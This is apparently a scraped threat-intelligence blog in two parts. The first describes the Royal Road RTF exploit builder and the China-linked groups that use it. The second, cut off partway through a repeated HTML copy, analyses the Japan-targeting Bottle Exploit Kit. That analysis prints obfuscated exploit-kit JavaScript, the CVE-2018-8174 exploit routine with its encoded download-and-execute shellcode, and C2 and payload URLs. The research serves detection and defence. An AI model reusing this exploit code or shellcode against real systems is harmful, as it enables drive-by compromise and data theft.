Abstract Several targeted attack groups share the tools used in the attack and are reported to be doing similar attacks. Attack tools are also shared in attacks targeting Japanese organizations, for example, Tick. Tick may use a tool called Royal Road RTF Weaponizer. And Royal Road is used by targeted attack groups such as Goblin Panda and Temp.Trident that is suspected of being involved in China. In this blog, we will focus on the Royal Road, and introduce the features of the tool, such as the outline of the tool, its behavior, and the exploited vulnerability. Next, the targeted attack groups that use the Royal Road are listed, and each attack case is shown in detail. We have collected over 100 malicious documents from 2018 and investigated malware that is deployed and downloaded from there. Even in groups using the same Royal Road, we attributed them based on the target country/organization, the technique used for the attack, the malware executed, etc. There are a wide variety of countries/organizations targeted for attack, mainly in Asia. Such information has been published by researchers all over the world, but it’s not widely known that Royal Road is used in Tick attacks targeting Japanese organizations. Attacks using Royal Road are still active in 2019. Share analysis results of malicious documents and malware based on the cases we observed. Other targeted attack groups may be related to Royal Road. We introduce the attack cases of these attack groups and show their relevance. Finally, we show the hunting technique using the characteristics of RTF files using Royal Road and the techniques that are preferred by targeted attack groups that use them. This blog will help researchers who are researching and analyzing targeted attacks and CSIRT/SOC members to understand the attacks and take countermeasures. Summary Royal Road Royal Road is RTF weaponizer that named by Anomali. Sometimes called “8.t RTF exploit builder”. This tool is not OSS, However it’s shared between multiple actors. We define the RTFs generated by RoyalRoad is supposed to satisfy the following two conditions: Exploit the vulnerability in the Equation Editor Have an object named 8.t in the RTF Royal Road behaves as follows. RTF create a file (8.t) using ActiveX Control “Package” when opening a document All Vulnerabilities used by exploit coed are based on Equation Editor. CVE-2017-11882 CVE-2018-0798 CVE-2018-0802 It decode 8.t, execute malware, dll-sideloading, etc Classification v1-v5 defined by Proofpoint and Anomali published at VB2019. We are doing more research about RTF Object. RTF analysis showed that there was a special byte sequence immediately before the shellcode. We called that an object pattern. 8.t encoding is not distinguished by version. It’s considered an actor distinction rather than a tool distinction. About v3, RTF including 8.t could not be found in our survey, so we define this as RoyalRoad-related, not RoyalRoad. New version definitions for v6 and later. The object string has changed a little since v5, but it is basically the same. v7 has a very different object string. v7 object pattern is same as v4-v6, but part ofobject data exists randomly. For attribution Time submission to public service RTF creation Target country decoy file language RTF characteristics Object strings Object patterns Package patterns Object name, Path Payload encoding patterns Dropped file name Malware execution techniques T1137 (Office Application Startup) T1073 (DLL Side-Loading) Final payload (malware family) Actors Here are the actors that have been confirmed to use RoyalRoad. It is considered that China’s involvement is suspected. These are tables summarizing each actor’s characteristics. We categorize these actors into three groups. Group Group-A is Conimes, Periscope and Rancor. Group-B is Trident, Tick, TA428 and Tonto. Group-C is something else we don’t know. Group-A is targeting Southeast Asia. Periscope and Conimes ware active at the same time and share the same techniques. Conimes and Rancor ware also active at the same time and share some techniques. We believe these groups are close and may share tools and insights. Group-B is including Trident, Tick, TA428 and Tonto. These are actors targeting East Asia, especially Russia, Korea and Japan. Tick, TA428 and Tonto may use the same technique. Especially Tick and Tonto are very similar. We believe that Group-B actors are very close and share techniques and insights. Wrap-up The RTF file created using the Royal Road exploits a vulnerability in the equation editor. The RTF file has a various of characteristics that help with attribution. There are many actors who use Royal Road. We can divide them into three groups and suppose connections between actors. Appendix Appendix-1: IOC https://nao-sec.org/jsac2020_ioc.html Appendix-2: Tool rr_decoder Yara Rules Full report is here: [PDF (EN)]

<h2 id="abstract">Abstract</h2> Several targeted attack groups share the tools used in the attack and are reported to be doing similar attacks. Attack tools are also shared in attacks targeting Japanese organizations, for example, Tick. Tick may use a tool called Royal Road RTF Weaponizer. And Royal Road is used by targeted attack groups such as Goblin Panda and Temp.Trident that is suspected of being involved in China. In this blog, we will focus on the Royal Road, and introduce the features of the tool, such as the outline of the tool, its behavior, and the exploited vulnerability. Next, the targeted attack groups that use the Royal Road are listed, and each attack case is shown in detail. We have collected over 100 malicious documents from 2018 and investigated malware that is deployed and downloaded from there. Even in groups using the same Royal Road, we attributed them based on the target country/organization, the technique used for the attack, the malware executed, etc. There are a wide variety of countries/organizations targeted for attack, mainly in Asia. Such information has been published by researchers all over the world, but it’s not widely known that Royal Road is used in Tick attacks targeting Japanese organizations. Attacks using Royal Road are still active in 2019. Share analysis results of malicious documents and malware based on the cases we observed. Other targeted attack groups may be related to Royal Road. We introduce the attack cases of these attack groups and show their relevance. Finally, we show the hunting technique using the characteristics of RTF files using Royal Road and the techniques that are preferred by targeted attack groups that use them. This blog will help researchers who are researching and analyzing targeted attacks and CSIRT/SOC members to understand the attacks and take countermeasures. <h2 id="summary">Summary</h2> <h3 id="royal-road">Royal Road</h3> Royal Road is RTF weaponizer that named by Anomali. Sometimes called “8.t RTF exploit builder”. This tool is not OSS, However it’s shared between multiple actors. We define the RTFs generated by RoyalRoad is supposed to satisfy the following two conditions: <ol> <li>Exploit the vulnerability in the Equation Editor</li> <li>Have an object named 8.t in the RTF</li> </ol> Royal Road behaves as follows. <ol> <li> RTF create a file (8.t) using ActiveX Control “Package” when opening a document </li> <li>All Vulnerabilities used by exploit coed are based on Equation Editor. <ul> <li>CVE-2017-11882</li> <li>CVE-2018-0798</li> <li>CVE-2018-0802</li> </ul> </li> <li>It decode 8.t, execute malware, dll-sideloading, etc</li> </ol> <img src="https://nao-sec.org/assets/2020-01-30/behavior.png" alt="" /> Classification v1-v5 defined by Proofpoint and Anomali published at VB2019. We are doing more research about RTF Object. RTF analysis showed that there was a special byte sequence immediately before the shellcode. We called that an object pattern. 8.t encoding is not distinguished by version. It’s considered an actor distinction rather than a tool distinction. About v3, RTF including 8.t could not be found in our survey, so we define this as RoyalRoad-related, not RoyalRoad. New version definitions for v6 and later. The object string has changed a little since v5, but it is basically the same. v7 has a very different object string. v7 object pattern is same as v4-v6, but part ofobject data exists randomly. <img src="https://nao-sec.org/assets/2020-01-30/version.png" alt="" /> <h3 id="for-attribution">For attribution</h3> <ul> <li>Time <ul> <li>submission to public service</li> <li>RTF creation</li> </ul> </li> <li>Target country <ul> <li>decoy file language</li> </ul> </li> <li>RTF characteristics <ul> <li>Object strings</li> <li>Object patterns</li> <li>Package patterns</li> <li>Object name, Path</li> </ul> </li> <li>Payload encoding patterns</li> <li>Dropped file name</li> <li>Malware execution techniques <ul> <li>T1137 (Office Application Startup)</li> <li>T1073 (DLL Side-Loading)</li> </ul> </li> <li>Final payload (malware family)</li> </ul> <h3 id="actors">Actors</h3> Here are the actors that have been confirmed to use RoyalRoad. It is considered that China’s involvement is suspected. <img src="https://nao-sec.org/assets/2020-01-30/actor1.png" alt="" /> <img src="https://nao-sec.org/assets/2020-01-30/actor2.png" alt="" /> These are tables summarizing each actor’s characteristics. We categorize these actors into three groups. <img src="https://nao-sec.org/assets/2020-01-30/actor_details.png" alt="" /> <h3 id="group">Group</h3> <ul> <li>Group-A is Conimes, Periscope and Rancor.</li> <li>Group-B is Trident, Tick, TA428 and Tonto.</li> <li>Group-C is something else we don’t know.</li> </ul> <img src="https://nao-sec.org/assets/2020-01-30/group.png" alt="" /> Group-A is targeting Southeast Asia. Periscope and Conimes ware active at the same time and share the same techniques. Conimes and Rancor ware also active at the same time and share some techniques. We believe these groups are close and may share tools and insights. <img src="https://nao-sec.org/assets/2020-01-30/groupA.png" alt="" /> Group-B is including Trident, Tick, TA428 and Tonto. These are actors targeting East Asia, especially Russia, Korea and Japan. Tick, TA428 and Tonto may use the same technique. Especially Tick and Tonto are very similar. We believe that Group-B actors are very close and share techniques and insights. <img src="https://nao-sec.org/assets/2020-01-30/groupB.png" alt="" /> <h3 id="wrap-up">Wrap-up</h3> The RTF file created using the Royal Road exploits a vulnerability in the equation editor. The RTF file has a various of characteristics that help with attribution. There are many actors who use Royal Road. We can divide them into three groups and suppose connections between actors. <h3 id="appendix">Appendix</h3> <h4 id="appendix-1-ioc">Appendix-1: IOC</h4> <ul> <li><a href="https://nao-sec.org/jsac2020_ioc.html">https://nao-sec.org/jsac2020_ioc.html</a></li> </ul> <h4 id="appendix-2-tool">Appendix-2: Tool</h4> <ul> <li><a href="https://github.com/nao-sec/rr_decoder">rr_decoder</a></li> <li><a href="https://github.com/nao-sec/yara_rules">Yara Rules</a></li> </ul> <hr /> Full report is here: <a href="https://github.com/nao-sec/materials/raw/master/JSAC%2BCPRCon2020/An_Overhead_View_of_the_Royal_Road.pdf">[PDF (EN)]</a>
Say hello to Bottle Exploit Kit targeting Japan

Thu, 12 Dec 2019 15:00:00 -0000

First On December 11, 2019, we were strolling through ad-networks. As before, we observed RIG, Fallout and Underminer Exploit Kit, but observed other interesting Drive-by Download attack. We call it “Bottle Exploit Kit”. BottleEK targets only Japanese users. According to our research, BottleEK has been active at least in September 2019. This time we introduce BottleEK. Sample traffic data is here. Traffic We have confirmed that we are redirected to BottleEK by malvertising. When you are redirected from ad-network to BottleEK, the landing page html is loaded first. The landing page loads two JavaScipt files. <!doctype html> <html lang="ja"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=10"> <meta http-equiv="Expires" content="0"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Cache" content="no-cache"> <link href="file/style.css" rel="stylesheet" type="text/css"/> </head> <body style="background-color: #F4F4F4;font-family:MS PGothic,Arial,Hiragino Kaku Gothic ProN,Osaka,sans-serif"> <div id="main" class="main"></div> <script type="text/javascript" src="file/ajax.min.js"></script> <script type="text/javascript" src="file/main.js"></script> </body> </html> “ajax.min.js” is a JavaScript file for communication. It is used once to get the exploit code URL. Since it’s not important, we will omit it this time. Please remember only this code. function e() { var b = document.createElement("script"), c = (new Date).getTime() + Math.round(1e3 * Math.random()), d = "JSONP_" + c; a[d] = function (a) { clearTimeout(s), document.body.removeChild(b), q(a) }, b.src = h + (h.indexOf("?") > -1 ? "&" : "?") + "callback=" + d, b.type = "text/javascript", document.body.appendChild(b), f(d, b) } Next, let’s read “main.js”. This file contains obfuscation, debug detection and environment detection.　Reading everything is not easy… First, a large array is defined. This looks like a Base64 string, but base64_decode doesn’t make any meaningful data. To decrypt this, you need to read two processes. var _0x1d5a = ['bsK+BcOlwpXCmg==', 'OsKhwoIKb8OOwrHDsMOvEcOHw4Fn', 'ZMKfw6Fqw5R0', 'T1xqw70=', ... The first process is to swap the order of the arrays. This is code like this: var _0x5906e4 = function (_0x35d916) { while (--_0x35d916) { _0x4480b8['push'](_0x4480b8['shift']()); } }; /* --- Snip --- */ var _0x29fbca = { 'getCookie': function (_0xa8b74, _0x1731ce) { _0xa8b74 = _0xa8b74 || function (_0x1e7379) { return _0x1e7379; }; var _0x36cf86 = _0xa8b74(new RegExp('(?:^|;\x20)' + _0x1731ce['replace'](/([.$?*|{}()[]\/+^])/g, '$1') + '=([^;]*)')); var _0x3ff1ff = function (_0xf3a699, _0x2d4894) { _0xf3a699(++_0x2d4894); }; _0x3ff1ff(_0x5906e4, _0x3c6c93); return _0x36cf86 ? decodeURIComponent(_0x36cf86[0x1]) : undefined; } } _0x29fbca['getCookie'](null, 'counter'); Next, the array data with the order changed is decoded. This is the code for decryption. A combination of Base64, URL Encode and RC4. var decode = function (enc_data, key) { var a = [], b = 0, c, d = '', e = ''; enc_data = atob(enc_data); for (var i = 0, length = enc_data['length']; i < length; i++) { e += '%' + ('00' + enc_data['charCodeAt'](i)['toString'](16))['slice'](-2); } enc_data = decodeURIComponent(e); for (var i = 0; i < 256; i++) { a[i] = i; } /* RC4 */ for (i = 0; i < 256; i++) { b = (b + a[i] + key['charCodeAt'](i % key['length'])) % 256; c = a[i]; a[i] = a[b]; a[b] = c; } i = 0; b = 0; for (var j = 0; j < enc_data['length']; j++) { i = (i + 1) % 256; b = (b + a[i]) % 256; c = a[i]; a[i] = a[b]; a[b] = c; d += String['fromCharCode'](enc_data['charCodeAt'](j) ^ a[(a[i] + a[b]) % 256]); } return d; }; This decrypts the array data and executes the main process. First, check that username is set in the cookie. If it is set, processing ends. If not, set cookie username=bingv and the attack will continue. var user = getCookie('username'); if (user == '') { setCookie('username', 'bingv', 0x1); Next, check user environment. This is one of the most characteristic codes of the Bottle Exploit Kit. var chk = checkEnv(); checkEnv gets the browser language setting. If it is not Japanese, display a dummy html and end. function checkEnv() { var _0x4db42a = (navigator['language'] || navigator['browserLanguage'])['toLowerCase'](); if (_0x4db42a['indexOf']('ja') == -0x1) return 0x0; document['getElementById']('main')['innerHTML'] = "<h1>Customer Login</h1><form><input type='text'value='User'><input type='password'><input type='submit'value='Submit'></form>"; And, browser information is acquired by User-Agent. If it is not Internet Explorer, display a dummy html and end in the same way. var _0x100f15 = navigator['userAgent']; var _0xed2c96 = _0x100f15['indexOf']('compatible') > -0x1 && _0x100f15['indexOf']('MSIE') > -0x1; var _0x4d34a9 = _0x100f15['indexOf']('Trident') > -0x1 && _0x100f15['indexOf']('rv:11.0') > -0x1; if (_0xed2c96) { if (_0x2956('0x43', '^eQ7') !== _0x2956('0x44', '4@%$')) { var _0x41dde8 = new RegExp("MSIE (\d+\.\d+);"); _0x41dde8['test'](_0x100f15); var _0x50d3cb = parseFloat(RegExp['$1']); return _0x50d3cb; } else { _0x53ccba(this, function () { var _0x2e6966 = new RegExp("function *$ *$"); var _0xdc7ac8 = new RegExp("\+\+ *(?:_0x(?:[a-f0-9]){4,6}|(?:\b|\d)[a-z0-9]{1,4}(?:\b|\d))", 'i'); var _0x4fc827 = _0x118083('init'); if (!_0x2e6966['test'](_0x4fc827 + 'chain') || !_0xdc7ac8['test'](_0x4fc827 + 'input')) { _0x4fc827('0'); } else { _0x118083(); } })(); } If these checks are passed, the image is displayed. The 1.gif used at this time is an image of the bottle. The str1 displayed below the image is Japanese. var str1 = '読み込み中。。。お待ちください&nbsp;&nbsp;&nbsp;&nbsp;'; /* --- Snip --- */ if (chk > 0x0) { var myimg = document['createElement']('img'); myimg['setAttribute']('id', 'ldimg'); myimg['setAttribute']('style', 'position:absolute;width:40%;left:30%;height:40%; top:20%; z-index: 10;display:inline'); myimg['setAttribute']('src', 'file/1.gif'); document['body']['appendChild'](myimg); var myp = document['createElement']('p'); myp['setAttribute']('id', 'ldpr'); myp['setAttribute']('style', 'font-size:30px; position:absolute; left:5%; text-align:center; height:10%; top:60%; width:90%; z-index:10;'); document['body']['appendChild'](myp); for (var i = 0x0; i <= LOAD_SECOND; i++) { var progress = Math['round'](i * 0x64 / LOAD_SECOND); (function (_0x368e63) { setTimeout(function () { change_progress(_0x368e63, str1); }, i * 0x3e8); }(progress)); } And it gets the exploit code. Three parameters are used at that time. Internet Explorer version is 64bit Adobe Flash Player version var is64 = 0x0; if (navigator['platform']['indexOf']('64') != -0x1) is64 = 0x1; var fls = flashChecker(); ajax({ 'type': 'GET', 'dataType': 'jsonp', 'timeOut': 0x2710, 'url': '/conn.php?callback=?', 'data': { 'data1': chk, 'data2': is64, 'data3': fls['v'] }, When send this request, use the ajax.min.js you read earlier. Therefore, callback is added at the end. function e() { var b = document.createElement("script"), c = (new Date).getTime() + Math.round(1e3 * Math.random()), d = "JSONP_" + c; a[d] = function (a) { clearTimeout(s), document.body.removeChild(b), q(a) }, b.src = h + (h.indexOf("?") > -1 ? "&" : "?") + "callback=" + d, b.type = "text/javascript", document.body.appendChild(b), f(d, b) } If successful, read the exploit code using the response data. When exploiting the vulnerability of Internet Explorer, read file/vbs.vbs, and when exploiting the vulnerability of Adobe Flash Player, read file/swf.swf. 'success': function (_0x2ad29a) { if (_0x2ad29a[0x1] != '') { if (_0x2956('0x69', '904!') !== _0x2956('0x6a', 'mNBB')) { var _0x5517a0 = document['createElement']('embed'); _0x5517a0['src'] = _0x2ad29a[0x1]; _0x5517a0['setAttribute']('style', 'width:1px; height:1px'); document['body']['appendChild'](_0x5517a0); } else { var _0x33b1ee = cname + '='; var _0x3a1f81 = document['cookie']['split'](';'); for (var _0x2e7aac = 0x0; _0x2e7aac < _0x3a1f81['length']; _0x2e7aac++) { var _0x446c09 = _0x3a1f81[_0x2e7aac]; while (_0x446c09['charAt'](0x0) == ' ') _0x446c09 = _0x446c09['substring'](0x1); if (_0x446c09['indexOf'](_0x33b1ee) != -0x1) return _0x446c09['substring'](_0x33b1ee['length'], _0x446c09['length']); } return ''; } } else if (_0x2ad29a[0x0] != '') { var _0x5a39f4 = document['createElement']('script'); _0x5a39f4['type'] = 'text/vbscript'; _0x5a39f4['src'] = _0x2ad29a[0x0]; document['body']['appendChild'](_0x5a39f4); } } vbs.vbs exploits CVE-2018-8174 and swf.swf exploits CVE-2018-15982. CVE-2018-8174 vbs.vbs is a simple string encoding. Decoding this will give you almost the same code as the PoC. Sub StartExploit UAF InitObjects vb_adrr=LeakVBAddr() vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr)) msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll") krb_base=GetBaseFromImport(msv_base,"kernelbase.dll") ntd_base=GetBaseFromImport(msv_base,"ntdll.dll") VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect") NtContinueAddr=GetProcAddr(ntd_base,"NtContinue") SetMemValue GetShellcode() ShellcodeAddr=GetMemValue()+8 SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr) lIlll=GetMemValue()+69596 SetMemValue ExpandWithVirtualProtect(lIlll) llIIll=GetMemValue() ExecuteShellcode End Sub StartExploit This is the shellcode that is running. Function GetShellcode() IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("%u4cbf%u73d0%udb2c%ud9c5%u2474%u5bf4%uc92b%uc3b1%u7b31%u0313%u137b%uc383%u3248%uc586%ub3ff%u1669%u129b%u1659%u5563%ud61f%u581b%u9794%ue9d7%u03ea%ued6c%u2b61%uaef9%uef65%ueece%ue36d%u2f59%ufcf2%uaf99%u42fa%uac50%uf9c5%ub9e8%u3441%u5399%u928a%u40ea%uf18e%uabfc%ub143%u91b1%uc263%u73c0%ua49c%u7ceb%u2d28%u4338%uee19%u04b5%uc8a6%ub29d%u5eaa%u48ee%ua716%u7468%ua355%u8963%uc79e%u923b%u5373%u8ee3%ue825%uef63%uae42%uec9b%u2c9b%uf16c%u7bfc%ubb1b%uf5f2%ub84e%u407a%u7b84%u3dbf%uf727%u3e7a%u132c%ubd03%uf4e5%u3d85%ufaf6%u84a1%u7100%uf9db%u8555%u4068%u4ea9%ubf2a%u5223%u1b5f%ue940%u64ac%u57cd%u1051%udcdd%u5fad%u25de%u08fd%ufc1f%u5df2%uf0d3%ua6bd%u85a8%u568f%u9ea5%u948e%u177e%u62d5%u6d0b%ucc2e%ua750%ua40d%udbed%uafc3%u23f1%u2fe4%u0ea9%u3bf4%u5177%u067d%uda7b%u7538%u1e4a%u0e97%u22a0%u1df4%u736b%uf652%u8450%uf9a3%u8bed%uc0dd%u7e05%ucce0%u860d%u32e3%u0232%ua7c3%ueacc%ubcc2%ufc37%u3c02%u0238%u3d04%uf9b0%uc72c%u1cd4%u37d0%ua2db%ud8ea%uebae%u89da%ub539%ud51e%ub3e9%ud55a%u8284%u7550%u5c69%ufc9d%u99d0%ub810%u099a%u13d4%u551e%u151c%u5d5b%u539e%u756b%u6290%u7a94%uadac%uc3e3%u2d5b%ud385%u35b3%u1b97%u49bc%u6f51%u4a3e%u1962%u3bcd%ufeda%uef25%u011c%uef4a%u75d6%ue8c8%ufce9%u8023%u0d53%u56ac%uf2a5%ua8d3%u866f%ua351%uee70%uc2bd%u1fc8%u6056%ue02a%u7659%u94e4%u765d%ub77e%ucf28%u2f6a%u2e8f%u506d%uf82f%ue918%ufacc%ud66c%u9c04%ue96e%u622a%u9fb8%ubd93%ue93b%u563f%ue848%u59bf%ud1cd%uf900%u9f58%u5ba4%ue901%u8b66%u169f%ub397%ue836%u4c68%ubcc8%ua0e3%ud249%u39b4%u2b49%u6c66%uc31e%u6e75%uec5f%u7b39%u2d8a%u0946%u5680%u54cb%u6b20%u0608%udfe3%ue269%u88cb%u9901%u8fbb%uadaf%u3f01%u5e1f%u7ab2%uec8f%uf355%ud601%u2fe0%ub634%uaa9e%u0300%u5986%ue7ea%u6545%u2bb1%u1ad0%ub714%u98e5%u5888%u0d84%u602a%ub613%u00c3%u18f5%u98db%u15e1%u528b%u12ce%u7f0e%uf857%u4eac%u5f1f%u4f3f%u7c49%ue640%u4155%u0709%ub995%u0200%u79fd%u3f2c%u86fd%u64e7%u0c16%u6160%uede9%ue470%u2d6c%u098e%ufe91%ub0e2%uaf26%u6a03%uc2b0%u67b9%u5190%u48c4%u95ee%u1838%u2fc9%uea33%ucca3%ucad3%ueb0e%ua64b%u25e4%u0d53%u5ff8%ueb23%u5f00%uff85%ucde8%uffd4%u7c17%uc865%ub8e4%u4127%u82af%u0137%u583f%u2f9b%u9eba%ucfe5%u4e3b%u7597%u3f0b%u302c%u934f%uebcd%u915b%u78f2%uf169%u8b4a%u016d%uda54%uea49%ub067%u691c%uc9b7%u8de1%uc968%u6a4b%u6bd6%u4328%u5f2b%ueb9a%ufa15%u135a%u8446%u4bf2%u3644%uf808%u2d83%ua621%u871f%u46da%u4625%u4dd5%uae62%u62cf%u23b9%u8f5f%u0d88%u0f0c%uce77%u67c1%u4614%u0844%u868d%u84e2%ud721%u3dbd%ubed4%udb2f%u6f5c%u4fcb%u6ff1%ue246%u1d65%u6c07%ub958%u1cbb%u15a4%u9006%u95f4" &lIIII(IIIII(""))) IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141")) GetShellcode=IIlI End Function CVE-2018-15982 swf.swf is almost the same as PoC. package { import com.adobe.tvsdk.mediacore.metadata.Metadata; import flash.display.Sprite; import flash.events.Event; import flash.net.LocalConnection; import flash.system.Capabilities; import flash.utils.ByteArray; import flash.utils.Endian; public class Main extends Sprite { The executed shellcode is the same as CVE-2018-8174. Shellcode The shellcode downloads and executes malware just like other EKs. The malware is not encrypted. The shellcode was encoded by Shikata Ga Nai Encoder. The decoded shellcode is a simple code that downloads and executes a malwre. The list of APIs to use is as follows: The API hashing algorithm is imul83hAdd. Interestingly, the URL string of the download destination was created as a mutex. The malware is created as svchost.exe in% temp% and then executed with the WinExe function. Malware The malware is probably unique. We have never seen this elsewhere. According to my friend @VK_Intel, this could be a stealer targeting Japan. These are the characteristics of this malware. Check if Japanese environment using GetUserDefaultUILanguage Download and use unzip.exe from these websites ftp://ftp.cadwork.ch/DVD_V20/cadwork.dir/COM/unzip.exe ftp://freddy-ru.starlink.ru/ckJlag/antivir/SDFix/apps/unzip.exe ftp://ftp.cadwork.ch/DVD_V20/cadwork.dir/COM/unzip.exe Download and use Tor https://archive.torproject.org/tor-package-archive/torbrowser/8.0.8/tor-win32-0.3.5.8.zip C2 [POST] 5frjkvw2w3wv6dnv.onion/conn.php [GET] 5frjkvw2w3wv6dnv.onion/rd.php [POST] 4w6ylniamu6x7e3a.onion/connect.php User-Agent is Mozilla/5.0 (Windows NT 6.1; WOW64) Main file location %temp% C:\Users\Public Finally Bottle Exploit Kit is an exploit kit targeting Japan. It’s not as sophisticated as the Exploit Kit, but JavaScript is elaborate. It has been observed for at least three months ago, and its activity continues today. The vulnerabilities it exploits are the same as other EKs. The same should be noted. Keep an eye on trend of it. Many people helped with our research. Special thanks to @kafeine and @VK_Intel. IOC BottleEK Traffic priv.inteleksys.com (139.180.136.22) / /file/style.css /file/ajax.min.js /file/main.js /file/1.gif /conn.php /file/vbs.vbs /file/swf.swf sales.inteleksys.com (139.99.115.204) Hash main.js 588bb25acf86ac18323d800372bbdc0eb89ba3ce80ed3d891a9c41b8db93df26 1.gif f89a8cc4dee2ac551380d0ecf5ee2d6dc2d2be20bb1929599a23edf79d8ed127 vbs.vbs 0afe359d9659f9d43a737bf2e1fcbe4d7e216fee3085cad153a4548785bb0166 swf.swf 340bfa57fafda31843588619cf505d08bdf41b6c3caf0df2b3b260473f3768d1 Malware Traffic https://archive.torproject.org/tor-package-archive/torbrowser/8.0.8/tor-win32-0.3.5.8.zip 5frjkvw2w3wv6dnv.onion /conn.php /rd.php 4w6ylniamu6x7e3a.onion /connect.php Hash Malware 914eb64b93cbb631c710ef6cbd0f9cedf93415be421ccc6e285b288b87f3a246 c1b67a30119107365c4a311479794e07afb631980a649749501cb9f511fb0ab4 DLL 7d6823211590d0c9beffb964051ff0638e3e00beae3274733a6ccdf5c41fdede 6625c178cc56184a1d8f8d0cbabff3abcc90820cd158b5860b10d6196d606a82

<h2 id="first">First</h2> On December 11, 2019, we were strolling through ad-networks. As before, we observed RIG, Fallout and Underminer Exploit Kit, but observed other interesting Drive-by Download attack. We call it “Bottle Exploit Kit”. BottleEK targets only Japanese users. According to our research, BottleEK has been active at least in September 2019. This time we introduce BottleEK. <img src="https://nao-sec.org/assets/2019-12-13/0.gif" alt="" /> Sample traffic data is <a href="https://www.virustotal.com/gui/file/5195da2b95ec7b13876ccca113cf6816146788fddbe99f16e3cb6af34f6c0822/detection">here</a>. <h2 id="traffic">Traffic</h2> <img src="https://nao-sec.org/assets/2019-12-13/1.png" alt="" /> We have confirmed that we are redirected to BottleEK by malvertising. When you are redirected from ad-network to BottleEK, the landing page html is loaded first. The landing page loads two JavaScipt files. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><!doctype html> <html lang="ja"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=10"> <meta http-equiv="Expires" content="0"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Cache" content="no-cache"> <link href="file/style.css" rel="stylesheet" type="text/css"/> </head> <body style="background-color: #F4F4F4;font-family:MS PGothic,Arial,Hiragino Kaku Gothic ProN,Osaka,sans-serif"> <div id="main" class="main"></div> <script type="text/javascript" src="file/ajax.min.js"></script> <script type="text/javascript" src="file/main.js"></script> </body> </html> </code></pre></div></div> “ajax.min.js” is a JavaScript file for communication. It is used once to get the exploit code URL. Since it’s not important, we will omit it this time. Please remember only this code. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function e() { var b = document.createElement("script"), c = (new Date).getTime() + Math.round(1e3 * Math.random()), d = "JSONP_" + c; a[d] = function (a) { clearTimeout(s), document.body.removeChild(b), q(a) }, b.src = h + (h.indexOf("?") > -1 ? "&" : "?") + "callback=" + d, b.type = "text/javascript", document.body.appendChild(b), f(d, b) } </code></pre></div></div> Next, let’s read “main.js”. This file contains obfuscation, debug detection and environment detection.　Reading everything is not easy… First, a large array is defined. This looks like a Base64 string, but base64_decode doesn’t make any meaningful data. To decrypt this, you need to read two processes. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var _0x1d5a = ['bsK+BcOlwpXCmg==', 'OsKhwoIKb8OOwrHDsMOvEcOHw4Fn', 'ZMKfw6Fqw5R0', 'T1xqw70=', ... </code></pre></div></div> The first process is to swap the order of the arrays. This is code like this: <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var _0x5906e4 = function (_0x35d916) { while (--_0x35d916) { _0x4480b8['push'](_0x4480b8['shift']()); } }; /* --- Snip --- */ var _0x29fbca = { 'getCookie': function (_0xa8b74, _0x1731ce) { _0xa8b74 = _0xa8b74 || function (_0x1e7379) { return _0x1e7379; }; var _0x36cf86 = _0xa8b74(new RegExp('(?:^|;\x20)' + _0x1731ce['replace'](/([.$?*|{}()[]\/+^])/g, '$1') + '=([^;]*)')); var _0x3ff1ff = function (_0xf3a699, _0x2d4894) { _0xf3a699(++_0x2d4894); }; _0x3ff1ff(_0x5906e4, _0x3c6c93); return _0x36cf86 ? decodeURIComponent(_0x36cf86[0x1]) : undefined; } } _0x29fbca['getCookie'](null, 'counter'); </code></pre></div></div> Next, the array data with the order changed is decoded. This is the code for decryption. A combination of Base64, URL Encode and RC4. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var decode = function (enc_data, key) { var a = [], b = 0, c, d = '', e = ''; enc_data = atob(enc_data); for (var i = 0, length = enc_data['length']; i < length; i++) { e += '%' + ('00' + enc_data['charCodeAt'](i)['toString'](16))['slice'](-2); } enc_data = decodeURIComponent(e); for (var i = 0; i < 256; i++) { a[i] = i; } /* RC4 */ for (i = 0; i < 256; i++) { b = (b + a[i] + key['charCodeAt'](i % key['length'])) % 256; c = a[i]; a[i] = a[b]; a[b] = c; } i = 0; b = 0; for (var j = 0; j < enc_data['length']; j++) { i = (i + 1) % 256; b = (b + a[i]) % 256; c = a[i]; a[i] = a[b]; a[b] = c; d += String['fromCharCode'](enc_data['charCodeAt'](j) ^ a[(a[i] + a[b]) % 256]); } return d; }; </code></pre></div></div> This decrypts the array data and executes the main process. First, check that <code class="language-plaintext highlighter-rouge">username</code> is set in the cookie. If it is set, processing ends. If not, set cookie <code class="language-plaintext highlighter-rouge">username=bingv</code> and the attack will continue. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var user = getCookie('username'); if (user == '') { setCookie('username', 'bingv', 0x1); </code></pre></div></div> Next, check user environment. This is one of the most characteristic codes of the Bottle Exploit Kit. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var chk = checkEnv(); </code></pre></div></div> <code class="language-plaintext highlighter-rouge">checkEnv</code> gets the browser language setting. If it is not Japanese, display a dummy html and end. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function checkEnv() { var _0x4db42a = (navigator['language'] || navigator['browserLanguage'])['toLowerCase'](); if (_0x4db42a['indexOf']('ja') == -0x1) return 0x0; </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>document['getElementById']('main')['innerHTML'] = "<h1>Customer Login</h1><form><input type='text'value='User'><input type='password'><input type='submit'value='Submit'></form>"; </code></pre></div></div> And, browser information is acquired by User-Agent. If it is not Internet Explorer, display a dummy html and end in the same way. <div class="language-plaintext highlighter-rouge"><div 